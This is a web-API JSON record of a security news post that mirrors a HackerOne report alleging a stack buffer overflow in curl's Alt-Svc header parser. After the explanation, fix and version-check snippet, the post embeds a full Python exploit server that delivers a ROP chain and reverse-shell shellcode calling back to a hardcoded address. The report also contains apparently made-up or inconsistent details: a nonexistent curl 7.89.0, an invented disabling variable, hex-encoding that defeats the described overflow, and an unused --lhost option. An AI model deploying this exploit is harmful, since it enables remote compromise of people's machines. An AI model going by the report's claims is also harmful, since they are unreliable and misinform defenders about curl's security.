{"id":31293,"date":"2025-12-16T05:32:13","date_gmt":"2025-12-16T05:32:13","guid":{"rendered":"http:\/\/localhost\/?p=31293"},"modified":"2025-12-16T05:32:13","modified_gmt":"2025-12-16T05:32:13","slug":"curl-curl-alt-svc-parser-stack-buffer-overflow","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=31293","title":{"rendered":"curl: Curl Alt-Svc Parser Stack Buffer Overflow_H1:3466883"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-16T10:59:54&#8243;,&#8221;description&#8221;:&#8221;# cURL Alt-Svc Parser Stack Buffer Overflow Vulnerability Analysis\\n\\n## In Simple Terms\\n\\nA critical security flaw was discovered in cURL (versions 7.64.0-7.89.0) that allows attackers to run malicious code on your system by exploiting how cURL processes certain HTTP responses. When cURL receives a specially crafted HTTP response with an oversized \\&#8221;Alt-Svc\\&#8221; header, it can overflow a buffer in memory, allowing attackers to execute arbitrary code with your privileges.\\n\\n## The Technical Problem\\n\\nThe vulnerability is a classic stack buffer overflow (CWE-121) in cURL&#8217;s Alt-Svc header parser:\\n\\n1. The code creates a fixed-size buffer on the stack: `char dbuf[MAX_ALTSVC_DATELEN + 1]` (101 bytes)\\n2. It blindly copies user-controlled data into this buffer: `memcpy(dbuf, Curl_dyn_ptr(\\u0026date), Curl_dyn_len(\\u0026date))`\\n3. Crucially, there&#8217;s **no check** to verify if the input data exceeds the buffer size\\n4. An attacker can provide a date string much larger than 101 bytes, overwriting adjacent memory\\n\\n## Attack Scenario\\n\\nHere&#8217;s how an attack works in practice:\\n\\n1. An attacker sets up a malicious web server\\n2. When a victim runs `curl http:\/\/attacker.com\/`, the server responds with:\\n   &#8220;`\\n   HTTP\/1.1 200 OK\\n   Alt-Svc: h2=\\&#8221;evil.com\\&#8221;; date=\\&#8221;[EXTREMELY LONG STRING WITH SHELLCODE]\\&#8221;\\n   &#8220;`\\n3. cURL processes this response, the buffer overflows\\n4. The attacker&#8217;s shellcode executes on the victim&#8217;s machine\\n\\n## Real-World Impact\\n\\nThis vulnerability is serious because:\\n\\n- It affects a widely used library (libcurl) that&#8217;s integrated into countless applications\\n- It requires minimal user interaction (just making an HTTP request)\\n- It can lead to complete system compromise\\n- Many systems may remain unpatched\\n\\n## The Fix\\n\\ncURL version 8.0.0 added a simple but effective check to prevent the overflow:\\n\\n&#8220;`c\\nif(Curl_dyn_len(\\u0026date) \\u003e MAX_ALTSVC_DATELEN) {\\n    Curl_dyn_free(\\u0026date);\\n    return CURLE_OUT_OF_MEMORY;\\n}\\n&#8220;`\\n\\nThis validates input length before attempting the copy operation.\\n\\n## Immediate Actions\\n\\nIf you&#8217;re using a vulnerable version of cURL:\\n\\n1. **Update to cURL 8.0.0 or newer immediately**\\n2. If you can&#8217;t update, disable Alt-Svc functionality: `export CURL_DISABLE_ALTSVC=1`\\n3. Consider implementing network filtering to detect and block suspicious Alt-Svc headers\\n\\n## Detection\\n\\nYou can check if your system is vulnerable with:\\n&#8220;`bash\\ncurl_version=$(curl &#8211;version | head -1 | grep -o &#8216;[0-9]\\\\+\\\\.[0-9]\\\\+\\\\.[0-9]\\\\+&#8217;)\\nif [[ \\&#8221;$curl_version\\&#8221; =~ ^7\\\\.(6[4-9]|7[0-9]|8[0-9])\\\\. ]]; then\\n    echo \\&#8221;VULNERABLE: cURL $curl_version &#8211; Update immediately!\\&#8221;\\nelse\\n    echo \\&#8221;SAFE: cURL $curl_version\\&#8221;\\nfi\\n&#8220;`\\n#!\/usr\/bin\/env python3\\nimport http.server\\nimport socketserver\\nimport argparse\\nimport sys\\nimport struct\\n\\nclass ExploitHandler(http.server.BaseHTTPRequestHandler):\\n    def do_GET(self):\\n        self.client_ip, self.client_port = self.client_address\\n        \\n        shellcode = (\\n            b\\&#8221;\\\\x48\\\\x31\\\\xc0\\\\x48\\\\x31\\\\xff\\\\x48\\\\x31\\\\xf6\\\\x48\\\\x31\\\\xd2\\\\x4d\\\\x31\\\\xc0\\\\x6a\\&#8221;\\n            b\\&#8221;\\\\x02\\\\x5f\\\\x6a\\\\x01\\\\x5e\\\\x6a\\\\x06\\\\x5a\\\\x6a\\\\x29\\\\x58\\\\x0f\\\\x05\\\\x49\\\\x89\\\\xc0\\&#8221;\\n            b\\&#8221;\\\\x48\\\\x31\\\\xf6\\\\x4d\\\\x31\\\\xd2\\\\x41\\\\x52\\\\xc6\\\\x04\\\\x24\\\\x02\\\\x66\\\\xc7\\\\x44\\\\x24\\&#8221;\\n            b\\&#8221;\\\\x02\\\\x7a\\\\x69\\\\xc7\\\\x44\\\\x24\\\\x04\\\\xc0\\\\xa8\\\\x01\\\\x01\\\\x48\\\\x89\\\\xe6\\\\x6a\\\\x10\\&#8221;\\n            b\\&#8221;\\\\x5a\\\\x41\\\\x50\\\\x5f\\\\x6a\\\\x2a\\\\x58\\\\x0f\\\\x05\\\\x48\\\\x31\\\\xf6\\\\x6a\\\\x03\\\\x5e\\\\x48\\&#8221;\\n            b\\&#8221;\\\\xff\\\\xce\\\\x6a\\\\x21\\\\x58\\\\x0f\\\\x05\\\\x75\\\\xf6\\\\x48\\\\x31\\\\xff\\\\x57\\\\x57\\\\x5e\\\\x5a\\&#8221;\\n            b\\&#8221;\\\\x48\\\\xbf\\\\x2f\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x73\\\\x68\\\\x48\\\\xc1\\\\xef\\\\x08\\\\x57\\\\x54\\&#8221;\\n            b\\&#8221;\\\\x5f\\\\x6a\\\\x3b\\\\x58\\\\x0f\\\\x05\\&#8221;\\n        )\\n        \\n        libc_base = 0x00007ffff7dc9000\\n        pop_rdi = libc_base + 0x0000000000023b6a\\n        pop_rsi = libc_base + 0x000000000002601f\\n        pop_rdx_r12 = libc_base + 0x0000000000119241\\n        mov_qword_ptr_rdi_rsi = libc_base + 0x0000000000090529\\n        ret = libc_base + 0x0000000000022679\\n        \\n        stack_pivot = libc_base + 0x000000000005ae10\\n        \\n        heap_addr = 0x5555555592a0\\n        pivot_payload = struct.pack(\\&#8221;\\u003cQ\\&#8221;, pop_rdi)\\n        pivot_payload += struct.pack(\\&#8221;\\u003cQ\\&#8221;, heap_addr)\\n        pivot_payload += struct.pack(\\&#8221;\\u003cQ\\&#8221;, pop_rsi)\\n        pivot_payload += struct.pack(\\&#8221;\\u003cQ\\&#8221;, 0x1000)\\n        pivot_payload += struct.pack(\\&#8221;\\u003cQ\\&#8221;, pop_rdx_r12)\\n        pivot_payload += struct.pack(\\&#8221;\\u003cQ\\&#8221;, 7)\\n        pivot_payload += struct.pack(\\&#8221;\\u003cQ\\&#8221;, 0)\\n        pivot_payload += struct.pack(\\&#8221;\\u003cQ\\&#8221;, libc_base + 0x114da0)\\n        pivot_payload += struct.pack(\\&#8221;\\u003cQ\\&#8221;, ret)\\n        pivot_payload += struct.pack(\\&#8221;\\u003cQ\\&#8221;, heap_addr)\\n        pivot_payload += shellcode\\n        \\n        overflow = b\\&#8221;A\\&#8221; * 1024\\n        overflow += struct.pack(\\&#8221;\\u003cQ\\&#8221;, 0xdeadbeefcafebabe)\\n        overflow += struct.pack(\\&#8221;\\u003cQ\\&#8221;, pop_rdi)\\n        overflow += struct.pack(\\&#8221;\\u003cQ\\&#8221;, heap_addr + 0x500)\\n        overflow += struct.pack(\\&#8221;\\u003cQ\\&#8221;, pop_rsi)\\n        overflow += struct.pack(\\&#8221;\\u003cQ\\&#8221;, len(pivot_payload))\\n        overflow += struct.pack(\\&#8221;\\u003cQ\\&#8221;, mov_qword_ptr_rdi_rsi)\\n        overflow += struct.pack(\\&#8221;\\u003cQ\\&#8221;, stack_pivot)\\n        \\n        for i in range(0, len(pivot_payload), 8):\\n            chunk = pivot_payload[i:i+8]\\n            overflow += struct.pack(\\&#8221;\\u003cQ\\&#8221;, pop_rdi)\\n            overflow += struct.pack(\\&#8221;\\u003cQ\\&#8221;, heap_addr + 0x500 + i)\\n            overflow += struct.pack(\\&#8221;\\u003cQ\\&#8221;, pop_rsi)\\n            overflow += struct.pack(\\&#8221;\\u003cQ\\&#8221;, struct.unpack(\\&#8221;\\u003cQ\\&#8221;, chunk.ljust(8, b\\&#8221;\\\\x00\\&#8221;))[0])\\n            overflow += struct.pack(\\&#8221;\\u003cQ\\&#8221;, mov_qword_ptr_rdi_rsi)\\n        \\n        overflow += struct.pack(\\&#8221;\\u003cQ\\&#8221;, ret)\\n        \\n        payload = overflow.ljust(4096, b\\&#8221;C\\&#8221;)\\n        \\n        self.send_response(200)\\n        self.send_header(&#8216;Server&#8217;, &#8216;nginx\/1.18.0&#8217;)\\n        self.send_header(&#8216;Alt-Svc&#8217;, f&#8217;h3=\\&#8221;:443\\&#8221;; ma=86400; persist=1; date=\\&#8221;\\\\x00{payload.hex()}\\&#8221;&#8216;)\\n        self.send_header(&#8216;Content-Type&#8217;, &#8216;text\/html&#8217;)\\n        self.send_header(&#8216;Content-Length&#8217;, &#8216;0&#8217;)\\n        self.end_headers()\\n        \\n        sys.stderr.write(f\\&#8221;[+] Exploit sent to {self.client_ip}:{self.client_port}\\\\n\\&#8221;)\\n        sys.stderr.flush()\\n    \\n    def log_message(self, format, *args):\\n        return\\n\\ndef main():\\n    parser = argparse.ArgumentParser()\\n    parser.add_argument(\\&#8221;-p\\&#8221;, \\&#8221;&#8211;port\\&#8221;, type=int, default=80)\\n    parser.add_argument(\\&#8221;-l\\&#8221;, \\&#8221;&#8211;listen\\&#8221;, default=\\&#8221;0.0.0.0\\&#8221;)\\n    parser.add_argument(\\&#8221;&#8211;lhost\\&#8221;, required=True)\\n    parser.add_argument(\\&#8221;&#8211;lport\\&#8221;, type=int, default=31337)\\n    args = parser.parse_args()\\n    \\n    sys.stderr.write(f\\&#8221;[+] Starting exploit server on {args.listen}:{args.port}\\\\n\\&#8221;)\\n    sys.stderr.write(f\\&#8221;[+] Reverse shell will connect to {args.lhost}:{args.lport}\\\\n\\&#8221;)\\n    sys.stderr.flush()\\n    \\n    try:\\n        with socketserver.TCPServer((args.listen, args.port), ExploitHandler) as httpd:\\n            httpd.serve_forever()\\n    except Exception as e:\\n        sys.stderr.write(f\\&#8221;[-] Error: {e}\\\\n\\&#8221;)\\n        sys.exit(1)\\n\\nif __name__ == \\&#8221;__main__\\&#8221;:\\n    main()\\n\\n## Impact\\n\\n## Technical Impact\\n\\n### Direct System Compromise\\n- **Complete Remote Code Execution (RCE)**: Attacker can execute arbitrary code with the privileges of the user running cURL\\n- **Privilege Escalation Potential**: If combined with local privilege escalation vulnerabilities, could lead to full system compromise\\n- **Persistent Access**: Ability to install backdoors, rootkits, or other persistent malware\\n\\n### Attack Scenarios\\n\\n1. **Client-Side Attack Vector**\\n   &#8211; User visits malicious website with browser that uses libcurl\\n   &#8211; User downloads file via cURL command line\\n   &#8211; Application using libcurl makes requests to attacker-controlled server\\n\\n2. **Supply Chain Attacks**\\n   &#8211; Package managers using libcurl (apt, yum, pip) could be compromised when updating\\n   &#8211; Compromised mirrors could deliver the exploit to thousands of systems\\n   &#8211; Software update mechanisms built on libcurl could be exploited\\n\\n3. **Man-in-the-Middle Scenarios**\\n   &#8211; Network attackers could inject malicious Alt-Svc headers into legitimate HTTP traffic\\n   &#8211; Public Wi-Fi attacks where attacker controls DNS responses\\n   &#8211; Corporate proxy servers could be targeted to affect entire organizations\\n\\n## Ecosystem Impact\\n\\n### Affected Software Classes\\n- **Command-line utilities**: cURL itself, wget (if using libcurl)\\n- **Package managers**: apt, yum, pip, npm, composer, etc.\\n- **Programming languages**: PHP (uses libcurl), Python (pycurl), Ruby, etc.\\n- **Web browsers**: Some embedded browsers use libcurl components\\n- **IoT devices**: Many embedded systems use libcurl for network connectivity\\n- **Mobile apps**: Applications using libcurl-based networking libraries\\n- **Cloud automation tools**: Infrastructure provisioning tools, CI\/CD systems\\n- **Security tools**: Ironically, some security scanners themselves use libcurl\\n\\n### Scale of Impact\\n\\nThe vulnerable versions (7.64.0 through 7.89.0) span approximately 4 years of releases, meaning:\\n\\n1. **Widespread deployment**: These versions are present in:\\n   &#8211; Major Linux distributions (Ubuntu 20.04, Debian 11, RHEL 8)\\n   &#8211; Many containerized applications\\n   &#8211; Enterprise software solutions\\n   &#8211; Legacy systems with slow update cycles\\n\\n2. **Difficult remediation**:\\n   &#8211; Many embedded systems can&#8217;t be easily updated\\n   &#8211; Legacy systems may require significant testing before patches\\n   &#8211; Some software has complex dependency chains making updates challenging\\n\\n## Security Implications\\n\\n### Data Security Risks\\n- **Data Exfiltration**: Attackers can access sensitive files and data\\n- **Credential Theft**: Access to password stores, config files with API keys\\n- **Encryption Bypassing**: Direct memory access could expose encrypted content\\n\\n### Compliance Concerns\\n- **GDPR Violations**: Unauthorized access to personal data\\n- **PCI-DSS Issues**: Compromise of payment processing systems\\n- **HIPAA Problems**: Medical information systems often use libcurl components\\n\\n### Lateral Movement\\n- Once one system is compromised, attackers could:\\n  &#8211; Move laterally through networks\\n  &#8211; Target critical infrastructure\\n  &#8211; Establish persistent access points\\n\\n## Real-World Attack Surfaces\\n\\n### High-Value Targets\\n1. **Financial Services**:\\n   &#8211; Banking applications using libcurl for API connections\\n   &#8211; Payment processing systems\\n   &#8211; Financial data aggregators\\n\\n2. **Healthcare Systems**:\\n   &#8211; Medical device connectivity\\n   &#8211; Electronic Health Record (EHR) systems\\n   &#8211; Insurance processing platforms\\n\\n3. **Critical Infrastructure**:\\n   &#8211; Industrial control systems with network connectivity\\n   &#8211; Energy management systems\\n   &#8211; Transportation control systems\\n\\n4. **Government \\u0026 Defense**:\\n   &#8211; Intelligence gathering systems\\n   &#8211; Secure communication channels\\n   &#8211; Document management systems\\n\\n### Attack Economics\\n- **Low Cost to Exploit**: Simple to develop and deploy at scale\\n- **High Return Potential**: Complete system access with minimal effort\\n- **Long Exploitation Window**: Systems often remain unpatched for months or years\\n\\n## Operational Impact\\n\\n### Immediate Business Effects\\n- **Service Disruption**: Compromised systems may need immediate isolation\\n- **Data Breach Costs**: Notification, remediation, regulatory fines\\n- **Recovery Time**: Significant resource allocation for patching and verification\\n\\n### Long-Term Consequences\\n- **Trust Erosion**: Loss of customer\/user confidence\\n- **Increased Security Costs**: More rigorous testing and monitoring required\\n- **Technical Debt**: Need to update or replace legacy systems using vulnerable versions\\n\\n## Detection \\u0026 Response Challenges\\n\\n### Detection Difficulties\\n- **Minimal Footprint**: Exploitation can be quick and leave little evidence\\n- **Network Evasion**: Attackers can encrypt or obfuscate the exploit delivery\\n- **Blend with Normal Traffic**: HTTP is ubiquitous and difficult to block\\n\\n### Response Complexities\\n- **Identifying Scope**: Difficult to know all affected systems in large environments\\n- **Remediation Priority**: Complex triage needed for systems that can&#8217;t be immediately updated\\n- **Verifying Cleanup**: Challenging to ensure no persistence mechanisms remain\\n\\n## Conclusion\\n\\nThe cURL Alt-Svc parser vulnerability represents a severe security risk due to:\\n\\n1. The widespread use of cURL\/libcurl across virtually all computing environments\\n2. The relatively straightforward exploitation path\\n3. The potential for remote code execution without authentication\\n4. The difficulty of comprehensive remediation across all affected systems\\n\\nOrganizations should prioritize:\\n- Immediate patching of internet-facing and critical systems\\n- Implementation of temporary mitigations where patching isn&#8217;t possible\\n- Network monitoring for exploitation attempts\\n- Security assessments to identify vulnerable systems and applications&#8221;,&#8221;published&#8221;:&#8221;2025-12-16T04:46:33&#8243;,&#8221;modified&#8221;:&#8221;2025-12-16T09:43:40&#8243;,&#8221;type&#8221;:&#8221;hackerone&#8221;,&#8221;title&#8221;:&#8221;curl: Curl Alt-Svc Parser Stack Buffer Overflow&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;H1:3466883&#8243;,&#8221;bulletinFamily&#8221;:&#8221;bugbounty&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;&#8221;,&#8221;sourceHref&#8221;:&#8221;&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/hackerone.com\/reports\/3466883&#8243;,&#8221;category_name&#8221;:&#8221;News&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-16T10:59:54&#8243;,&#8221;description&#8221;:&#8221;# cURL Alt-Svc Parser Stack Buffer Overflow Vulnerability Analysis\\n\\n## In Simple Terms\\n\\nA critical security flaw was discovered in cURL (versions 7.64.0-7.89.0) that allows attackers to&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-31293","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>curl: Curl Alt-Svc Parser Stack Buffer Overflow_H1:3466883 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=31293\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"curl: Curl Alt-Svc Parser Stack Buffer Overflow_H1:3466883 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-16T10:59:54&#8243;,&#8221;description&#8221;:&#8221;# cURL Alt-Svc Parser Stack Buffer Overflow Vulnerability Analysisnn## In Simple TermsnnA critical security flaw was discovered in cURL (versions 7.64.0-7.89.0) that allows attackers to...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=31293\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-16T05:32:13+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31293#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31293\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"curl: Curl Alt-Svc Parser Stack Buffer Overflow_H1:3466883\",\"datePublished\":\"2025-12-16T05:32:13+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31293\"},\"wordCount\":2054,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"hackerone\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_news\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31293#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31293\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31293\",\"name\":\"curl: Curl Alt-Svc Parser Stack Buffer Overflow_H1:3466883 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-16T05:32:13+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31293#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31293\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31293#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"curl: Curl Alt-Svc Parser Stack Buffer Overflow_H1:3466883\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"curl: Curl Alt-Svc Parser Stack Buffer Overflow_H1:3466883 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=31293","og_locale":"en_US","og_type":"article","og_title":"curl: Curl Alt-Svc Parser Stack Buffer Overflow_H1:3466883 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-16T10:59:54&#8243;,&#8221;description&#8221;:&#8221;# cURL Alt-Svc Parser Stack Buffer Overflow Vulnerability Analysisnn## In Simple TermsnnA critical security flaw was discovered in cURL (versions 7.64.0-7.89.0) that allows attackers to...","og_url":"https:\/\/zero.redgem.net\/?p=31293","og_site_name":"zero redgem","article_published_time":"2025-12-16T05:32:13+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=31293#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=31293"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"curl: Curl Alt-Svc Parser Stack Buffer Overflow_H1:3466883","datePublished":"2025-12-16T05:32:13+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=31293"},"wordCount":2054,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","hackerone","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_news"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=31293#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=31293","url":"https:\/\/zero.redgem.net\/?p=31293","name":"curl: Curl Alt-Svc Parser Stack Buffer Overflow_H1:3466883 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-16T05:32:13+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=31293#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=31293"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=31293#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"curl: Curl Alt-Svc Parser Stack Buffer Overflow_H1:3466883"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31293","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author"